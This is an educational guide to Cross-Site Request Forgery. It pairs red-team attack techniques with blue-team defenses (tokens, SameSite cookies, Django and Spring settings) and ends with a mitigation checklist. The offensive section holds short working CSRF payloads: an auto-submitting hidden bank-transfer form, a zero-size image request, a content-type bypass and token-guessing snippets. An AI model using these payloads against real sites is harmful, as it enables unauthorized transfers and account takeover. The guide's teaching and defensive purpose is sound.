CSRF (Cross-Site Request Forgery) Comprehensive Guide

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that tricks authenticated users into submitting unwanted requests to a web application where they are currently logged in.

CSRF Impact Severity:

  • Unauthorized account changes
  • Financial transactions (transfers, purchases)
  • Data modification or deletion
  • Account takeover
  • Privilege escalation

Red Team Techniques (Offensive)

1. Basic CSRF Attacks

Form-Based CSRF

<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>

GET-Based CSRF

<img src="https://bank.com/transfer?amount=1000&to=attacker" width="0" height="0">

2. Advanced CSRF Techniques

JSON CSRF with Flash

# Flash app that sends JSON POST with credentials
# Bypasses some CSRF protections

Content-Type Bypass

# Change Content-Type to bypass validation
<form enctype="text/plain" method="POST">
  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
</form>

3. CSRF Token Exploitation

Token Leakage

# Extract token from other pages
fetch('/settings').then(r => r.text())
  .then(html => extractToken(html))

Token Prediction

# If tokens are predictable
for i in range(1000,2000):
  try_token(base_token + str(i))

4. Real-World Attack Scenarios

Bank Transfer

1. Victim logs into bank.com
2. Visits attacker site with hidden form
3. Form submits transfer to attacker

Password Reset

1. Victim clicks link in phishing email
2. Hidden request changes email/password
3. Attacker gains account access

5. Tools & Automation

Discovery Tools

  • Burp Suite Scanner
  • OWASP ZAP
  • CSRF Tester

Exploitation Tools

  • Burp Suite CSRF PoC Generator
  • XSS Hunter (for token theft)
  • Custom JavaScript payloads

Analysis Tools

  • Browser developer tools
  • Token analysis scripts
  • Request analyzers

Blue Team Defenses (Defensive)

1. Anti-CSRF Tokens

Synchronizer Token Pattern

// Node.js example
const csrf = require('csurf');
app.use(csrf());
app.get('/form', (req, res) => {
  res.render('form', { csrfToken: req.csrfToken() });
});

Double Submit Cookie

// Set cookie and form field with same random value
Set-Cookie: CSRF-TOKEN=abc123;
<input type="hidden" name="csrf_token" value="abc123">

2. Cookie Protections

SameSite Attribute

Set-Cookie: session=abc123; SameSite=Lax; Secure

Cookie Prefixes

Set-Cookie: __Secure-session=abc123; Secure; HttpOnly

3. Additional Protections

Custom Headers

// Require custom header for API requests
if (request.headers['X-Requested-With'] !== 'XMLHttpRequest') {
  return response.status(403).send('Forbidden');
}

Referer Validation

// Check request origin
if (!request.headers.referer.startsWith('https://yourdomain.com')) {
  return response.status(403).send('Forbidden');
}

4. Framework Protections

Django CSRF Middleware

# settings.py
MIDDLEWARE = [
    'django.middleware.csrf.CsrfViewMiddleware',
    ...
]

# Template
<form method="post">{% csrf_token %}</form>

Spring Security

@Configuration
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
    }
}

5. Monitoring & Response

Detection

  • Missing CSRF tokens
  • Invalid token submissions
  • Referer header anomalies

Logging

  • Failed CSRF validations
  • Sensitive action attempts
  • Origin header mismatches

Response

  • Session invalidation
  • User notification
  • Forensic analysis

Additional Resources & References

Learning Resources

Security Tools

CSRF Mitigation Checklist

  • Implement anti-CSRF tokens for state-changing requests
  • Set SameSite cookie attribute (Strict or Lax)
  • Validate Referer headers for sensitive actions
  • Require re-authentication for critical operations
  • Use framework-provided CSRF protections
  • Monitor for failed CSRF validations
  • Educate developers about CSRF risks
  • Regularly test your defenses

Legal Notice

This content is provided for educational purposes only. Never test security vulnerabilities against systems without explicit permission. Unauthorized testing may violate laws.